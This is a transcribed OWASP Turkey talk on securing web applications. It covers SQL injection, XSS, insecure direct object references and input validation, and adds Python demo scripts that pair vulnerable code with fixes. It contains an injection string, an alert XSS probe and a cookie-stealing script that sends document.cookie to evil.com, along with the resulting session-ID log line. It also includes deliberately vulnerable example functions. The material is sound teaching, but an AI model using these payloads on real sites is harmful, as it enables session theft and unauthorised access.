Page 1: Bünyamin Demir - Secure YourApp

SecureYourApp

OWASP-Turkey

Bünyamin Demir

Page 2: Bünyamin Demir (@bunyamindemir)

– BSc, Kocaeli University, Department of Mathematics
– MSc, Kocaeli University, Graduate School of Natural and Applied Sciences; thesis on Oracle database security
– Application developer
– OWASP Turkey Chapter Leader
– Penetration tester
  • Web, mobile, network, SCADA, wireless, social engineering, ATM, DoS/DDoS and load testing
  • Source code analysis
– Trainer
  • Web/mobile application security auditing
  • Secure code development
  • Database security

Page 3: OWASP

Page 4: Why is OWASP Special?

Page 5: OWASP Projects

• OWASP Top 10
• OWASP Zed Attack Proxy (ZAP)
• OpenSAMM
• Cheat Sheets
• ESAPI
• ASVS
• Testing Guide
• Development Guide

Page 7: Application Security Verification Standard

Page 8: Application Security

[Figure: "Two weeks of ethical hacking" set against "Ten man-years of development"; flaw classes shown: Business Logic Flaws, Code Flaws, Security Errors]

Page 9: Attacker vs. Defender

Page 10: Web Application Threat Surface

Page 11: OWASP TOP 10

Page 12: A1 - Injection

Page 13: Anatomy of SQL Injection Attack

sql = "SELECT * FROM user_table WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"

What the developer intended:

username = john

password = password

SQL Query:

SELECT * FROM user_table WHERE username = 'john' AND password = 'password'

Page 14: Anatomy of SQL Injection Attack

sql = "SELECT * FROM user_table WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"

(This is DYNAMIC SQL built from untrusted input)

What the developer did not intend is parameter values like:

username = john

password =

SQL Query:

SELECT * FROM user_table WHERE username = 'john' AND password =

causes all rows in the users table to be returned!

Page 15: Bind Parameters (PHP)

// PDO prepared statement: the SQL text is fixed first, the values are bound separately
$stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
$stmt->execute();

Page 16: Parametrized Query (.NET)

SqlConnection objConnection = new SqlConnection(_ConnectionString);
objConnection.Open();
// @Name and @Password are placeholders; the text box values travel as typed parameters, never as SQL text
SqlCommand objCommand = new SqlCommand(
    "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);
// Parameters.Add(string, object) is marked obsolete in newer frameworks; AddWithValue is the equivalent
objCommand.Parameters.Add("@Name", NameTextBox.Text);
objCommand.Parameters.Add("@Password", PassTextBox.Text);
SqlDataReader objReader = objCommand.ExecuteReader();

Page 17: Prepare Statement (Java)

String newName = request.getParameter("newName");
String id = request.getParameter("id");

// SQL: '?' placeholders, values bound by position
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
pstmt.executeUpdate();

// HQL (Hibernate): named parameter, bound by name
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
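The slides on pages 13 to 17 show the vulnerable concatenation and the parameterized fix in ASP, PHP, .NET and Java but not the two running side by side. The script below is an added example written for this page (not the speaker's code) that does exactly that against an in-memory SQLite table named like the slide's user_table; the user rows and the attack value x' OR '1'='1 are constructed for the demo and are not from the slides.

```python
import sqlite3

# Constructed sample rows for the demo (assumption: not data from the slides)
USERS = [
    ("john", "password"),
    ("alice", "s3cret"),
    ("bob", "hunter2"),
]


def make_db():
    """In-memory user_table with the two columns the slide's query uses."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_table (username TEXT, password TEXT)")
    con.executemany("INSERT INTO user_table VALUES (?, ?)", USERS)
    return con


def login_vulnerable(con, username, password):
    """Dynamic SQL by string concatenation, the pattern from the slide.
    Returns the username of every row the query matched."""
    sql = ("SELECT username FROM user_table WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in con.execute(sql)]


def login_parameterized(con, username, password):
    """Same query with bind parameters: the SQL text is fixed before any
    user data arrives, so the quote in the payload is just a character."""
    sql = "SELECT username FROM user_table WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]


def demo():
    con = make_db()
    results = {}
    # What the developer intended
    results["normal_vuln"] = login_vulnerable(con, "john", "password")
    results["normal_safe"] = login_parameterized(con, "john", "password")
    # Constructed attack value (an assumption, not the slide's payload): the
    # quote closes the password literal and OR '1'='1' is true for every row,
    # because AND binds tighter than OR in the resulting WHERE clause.
    payload = "x' OR '1'='1"
    results["attack_vuln"] = login_vulnerable(con, "john", payload)
    results["attack_safe"] = login_parameterized(con, "john", payload)
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the constructed payload the concatenated query returns all three rows, which is the "all rows in the users table" outcome of page 14; the parameterized version compares the password column against the literal string and returns nothing.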

Page 18: A3 - XSS

Page 19: A3 - XSS

Page 20: Anatomy of XSS Attack

http://www.davshan.loc/friends.php?search=<abc>

<p>Result for <b><abc></b> :0<p><br />

The search parameter is reflected into the page without encoding, so a value that contains markup is rendered as markup:

http://www.davshan.loc/friends.php?search=<script>alert(1);</script>

Page 21: Anatomy of XSS Attack

Payload that sends the victim's cookies to the attacker's host:

<script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script>

The session ID then shows up in the attacker's web server access log:

187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5 HTTP/1.1" 200 7425 "http://www.davshan.loc/....

Page 22: OWASP Java Encoder Project

<%-- Basic HTML Context --%>
<body><b><%= Encode.forHtml(UNTRUSTED) %></b></body>

<%-- HTML Attribute Context --%>
<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />

<%-- Javascript Block context --%>
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);
</script>

<%-- Javascript Variable context --%>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>

Page 23: Rich Text

Page 24: OWASP HTML Sanitizer Project

// Allow-list policy: only <a href="https://..."> survives, and every link gets rel="nofollow"
PolicyFactory policy = new HtmlPolicyBuilder()
    .allowElements("a")
    .allowUrlProtocols("https")
    .allowAttributes("href").onElements("a")
    .requireRelNofollowOnLinks()
    .toFactory();   // HtmlPolicyBuilder hands out the PolicyFactory via toFactory()

String safeHTML = policy.sanitize(untrustedHTML);
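The policy on this slide is small enough to show what an allow-list sanitizer actually does with each piece of input. The class below is an added example written for this page, not the OWASP HTML Sanitizer's code: it implements the same four rules (only the a element, only the href attribute on it, only the https protocol, rel="nofollow" forced onto every link) on top of Python's html.parser, drops the contents of script and style, and re-escapes all text. The test inputs are constructed for the demo; rejecting relative URLs is a consequence of the https-only rule, not a claim about the OWASP library's behaviour.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkOnlySanitizer(HTMLParser):
    """Allow-list sanitizer mirroring the slide's policy: keep <a href="https://...">
    with rel="nofollow", drop every other tag (but keep its text), discard the
    contents of <script>/<style>, and re-escape all text and attribute values."""

    ALLOWED_TAGS = {"a"}
    ALLOWED_ATTRS = {"a": {"href"}}
    ALLOWED_PROTOCOLS = {"https"}
    DROP_CONTENT = {"script", "style"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # > 0 while inside <script>/<style>
        self.stack = []       # (tag, emitted) for every open tag seen

    def _safe_url(self, value):
        if value is None:
            return False
        # urlparse lowercases the scheme; "javascript:", "http:", "data:" all fail here
        return urlparse(value.strip()).scheme.lower() in self.ALLOWED_PROTOCOLS

    def handle_starttag(self, tag, attrs):
        if tag in self.DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth:
            return
        emitted = False
        if tag in self.ALLOWED_TAGS:
            kept = []
            for name, value in attrs:
                if name not in self.ALLOWED_ATTRS[tag]:
                    continue                      # onclick, style, target ... dropped
                if name == "href" and not self._safe_url(value):
                    continue                      # unsafe or non-https link dropped
                kept.append((name, value or ""))
            # an <a> whose href was rejected is not worth keeping as a tag
            if tag == "a" and any(n == "href" for n, _ in kept):
                kept.append(("rel", "nofollow"))
                attr_text = "".join(f' {n}="{escape(v, quote=True)}"' for n, v in kept)
                self.out.append(f"<{tag}{attr_text}>")
                emitted = True
        self.stack.append((tag, emitted))

    def handle_endtag(self, tag):
        if tag in self.DROP_CONTENT:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or not any(t == tag for t, _ in self.stack):
            return                                # stray close tag: ignore
        while self.stack:                         # close up to the matching open tag
            t, emitted = self.stack.pop()
            if emitted:
                self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def result(self):
        while self.stack:                         # close anything left open
            t, emitted = self.stack.pop()
            if emitted:
                self.out.append(f"</{t}>")
        return "".join(self.out)


def sanitize(untrusted_html):
    """Return the allow-listed HTML for the constructed or real input given."""
    p = LinkOnlySanitizer()
    p.feed(untrusted_html)
    p.close()
    return p.result()
```

Because attribute values are unescaped by the parser and re-escaped on output, an entity-encoded javascript: scheme is decoded before the protocol check rather than smuggled past it, and a quote inside a surviving href cannot break out of the attribute.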

Page 25: JQuery.Encoder

$(function() {
    // canonicalize first (undo double encoding), then encode for the HTML context
    $(".div [name=" + $.encoder.encodeForHTML($.encoder.canonicalize(window.location.hash.substr(1))) + "]");
});

Other contexts: encodeForHTMLAttribute, encodeForJavascript, encodeForURL, encodeForCSS

$('#profile_link').html('<a href="/profile/' + $.encoder.encodeForURL(userID) + '">Link</a>');
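Pages 20 to 22 and this slide make one point: the encoder has to match the context the data lands in (element text, quoted attribute, JavaScript string, URL component). The functions below are an added example written for this page, a Python counterpart to the Encode.forHtml / forHtmlAttribute / forJavaScriptBlock / encodeForURL calls above, not the OWASP Java Encoder's or jQuery.Encoder's code. The render_* helpers rebuild the friends.php reflection, the input field, the script block and the profile link from the slides; the attack strings other than the slide's <script>alert(1);</script> are constructed.

```python
import html
from urllib.parse import quote

# Constructed attacker inputs: the slide's payload plus one per extra context
SCRIPT_PAYLOAD = "<script>alert(1);</script>"
ATTR_PAYLOAD = '" onmouseover="alert(1)'
JS_PAYLOAD = '"; alert(document.cookie); //'


def encode_for_html(s):
    """Element text context: < > & " ' become entities, so markup is displayed, not parsed."""
    return html.escape(s, quote=True)


def encode_for_html_attribute(s):
    """Quoted attribute context: same entity set; the quote is what would end the attribute."""
    return html.escape(s, quote=True)


def encode_for_javascript(s):
    """JavaScript string context: every char outside [A-Za-z0-9] becomes \\xHH or \\uHHHH,
    so neither the string literal nor the enclosing <script> element can be terminated.
    (Plain JSON encoding is not enough: it leaves '<' alone, so '</script>' would break out.)"""
    out = []
    for ch in s:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append(f"\\x{ord(ch):02x}")
        else:
            out.append(f"\\u{ord(ch):04x}")
    return "".join(out)


def encode_for_url(s):
    """URL path/query component context: percent-encode everything except unreserved chars."""
    return quote(s, safe="")


def render_result(search):
    """friends.php-style reflection from page 20, now encoded for the <b> element's text."""
    return f"<p>Result for <b>{encode_for_html(search)}</b> :0</p>"


def render_input(value):
    return f'<input type="text" name="data" value="{encode_for_html_attribute(value)}" />'


def render_script(msg):
    return f'<script>var msg = "{encode_for_javascript(msg)}"; alert(msg);</script>'


def render_profile_link(user_id):
    return f'<a href="/profile/{encode_for_url(user_id)}">Link</a>'


if __name__ == "__main__":
    print(render_result(SCRIPT_PAYLOAD))
    print(render_input(ATTR_PAYLOAD))
    print(render_script(JS_PAYLOAD))
    print(render_profile_link("1/../admin"))
```

Note that the HTML and attribute encoders happen to be the same function here because both contexts are quoted; the JavaScript and URL encoders are deliberately different, and using the HTML encoder inside a script block or a URL is the classic mistake these projects exist to prevent.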

Page 26: A4 – Insecure Direct Object References

https://www.onlinebank.com/user?acct=6065

• Attacker notices his acct parameter is 6065

?acct=6065

• He modifies it to a nearby number

?acct=6066

• Attacker views the victim's account information
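What makes the acct=6066 walk work is that the handler trusts the identifier alone. The script below is an added example written for this page (not the speaker's code): a lookup that fails exactly like the slide, the same lookup with an ownership check against the server-side session, and a per-session indirect reference map along the lines of ESAPI's AccessReferenceMap. The account table, owners and balances are constructed for the demo.

```python
import secrets

# Constructed account table (assumption, not the slide's bank): acct id -> owner, balance
ACCOUNTS = {
    6065: {"owner": "attacker", "balance": 120},
    6066: {"owner": "victim", "balance": 9800},
}


class Forbidden(Exception):
    """Raised where a real application would answer 403/404."""


def view_account_vulnerable(acct):
    """IDOR: the only input is the attacker-controlled ?acct= value.
    Whoever can count to 6066 reads the victim's record."""
    return ACCOUNTS[acct]


def view_account_checked(session_user, acct):
    """Direct reference kept, but ownership is verified against the identity in
    the server-side session, never against anything the client sent."""
    rec = ACCOUNTS.get(acct)
    if rec is None or rec["owner"] != session_user:
        # one answer for 'does not exist' and 'not yours' avoids leaking which ids are valid
        raise Forbidden("access denied")
    return rec


def can_view(session_user, acct):
    """True if the checked lookup would succeed for this session user."""
    try:
        view_account_checked(session_user, acct)
        return True
    except Forbidden:
        return False


class IndirectReferenceMap:
    """Per-session random handles in place of the real ids (the idea behind
    ESAPI's AccessReferenceMap): the client never sees 6065/6066, and a handle
    it invents maps to nothing."""

    def __init__(self, session_user):
        self.session_user = session_user
        self._to_direct = {}
        for acct, rec in ACCOUNTS.items():
            if rec["owner"] == session_user:
                self._to_direct[secrets.token_urlsafe(8)] = acct

    def handles(self):
        """Opaque references this session may use in links and forms."""
        return list(self._to_direct)

    def resolve(self, handle):
        acct = self._to_direct.get(handle)
        if acct is None:
            raise Forbidden("unknown reference")
        # still authorise: the map is a convenience, the ownership check is the control
        return view_account_checked(self.session_user, acct)

    def can_resolve(self, handle):
        try:
            self.resolve(handle)
            return True
        except Forbidden:
            return False


if __name__ == "__main__":
    print("vulnerable:", view_account_vulnerable(6066))
    print("checked 6066 as attacker:", can_view("attacker", 6066))
    m = IndirectReferenceMap("attacker")
    print("handles:", m.handles(), "->", m.resolve(m.handles()[0]))
```

The indirect map is not a substitute for the authorization check: it removes the guessable identifier from the URL, but resolve() still routes through view_account_checked so that a map built for the wrong user cannot become a new IDOR.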

Page 27: Best way to SecureYourApp

Input Validation

Page 28: Input Validation - Java

import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Allow-list check: 6 to 12 ASCII letters or digits and nothing else;
// Matcher.matches() only succeeds if the whole input fits the pattern
public boolean validateUsername(String username) {
    String usernamePattern = "^[a-zA-Z0-9]{6,12}$";
    if (username == null) {
        return false;
    }
    Pattern p = Pattern.compile(usernamePattern);
    Matcher m = p.matcher(username);
    if (!m.matches()) {
        return false;
    }
    return true;
}

if (!validateUsername(username)) {
    // invalid username
}

Page 29: Input Validation - .NET

using System.Text.RegularExpressions;

// Allow-list for a class name: 1 to 10 letters, digits, dots or whitespace characters
if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.\s]{1,10}$"))
{
    // class name is not valid
}
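The two allow-list patterns above carry a subtlety a practitioner should test for: in .NET (and in Python's re.match) the $ anchor also matches just before a trailing newline, so "john01\n" passes ^[a-zA-Z0-9]{6,12}$ even though a newline is not in the character class; \z in .NET, or fullmatch() in Python, anchors at the real end of the string. Java's Matcher.matches() does not have this problem because it requires the entire input to be consumed. The script below is an added example written for this page (not the speaker's code) that ports both validators to Python and shows the sloppy and the strict anchoring side by side; the sample inputs are constructed.

```python
import re

# Same allow-list patterns as the Java (page 28) and .NET (page 29) slides
USERNAME_RE = re.compile(r"[a-zA-Z0-9]{6,12}")
CLASS_NAME_RE = re.compile(r"[a-zA-Z0-9.\s]{1,10}")
# Assumed stricter variant: a literal space instead of \s, which also admits tab and newline
CLASS_NAME_STRICT_RE = re.compile(r"[a-zA-Z0-9. ]{1,10}")


def validate_username(username):
    """Allow-list validation: None is rejected, and fullmatch() insists that the
    pattern covers the whole string, trailing newline included."""
    return username is not None and USERNAME_RE.fullmatch(username) is not None


def sloppy_validate_username(username):
    """The same pattern written with ^...$ and re.match: $ matches before a final
    newline, so 'john01\\n' is accepted. .NET's $ behaves the same way; use \\z there."""
    return username is not None and re.match(r"^[a-zA-Z0-9]{6,12}$", username) is not None


def validate_class_name(name):
    """Port of the .NET check: letters, digits, dots and any whitespace, 1 to 10 characters."""
    return name is not None and CLASS_NAME_RE.fullmatch(name) is not None


def validate_class_name_strict(name):
    """Same length rule, but only a plain space is allowed as whitespace."""
    return name is not None and CLASS_NAME_STRICT_RE.fullmatch(name) is not None


if __name__ == "__main__":
    # Constructed inputs: valid, SQL-injection-shaped, too short, trailing newline
    for candidate in ["john01", "john'--", "jo", "john01\n"]:
        print(repr(candidate), validate_username(candidate), sloppy_validate_username(candidate))
    for candidate in ["Sinif 1.A", "<b>x</b>", "a\nb"]:
        print(repr(candidate), validate_class_name(candidate), validate_class_name_strict(candidate))
```

Whether a tab or newline inside a class name is acceptable is a business decision, but it should be a deliberate one: \s in the .NET pattern makes it an accident.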
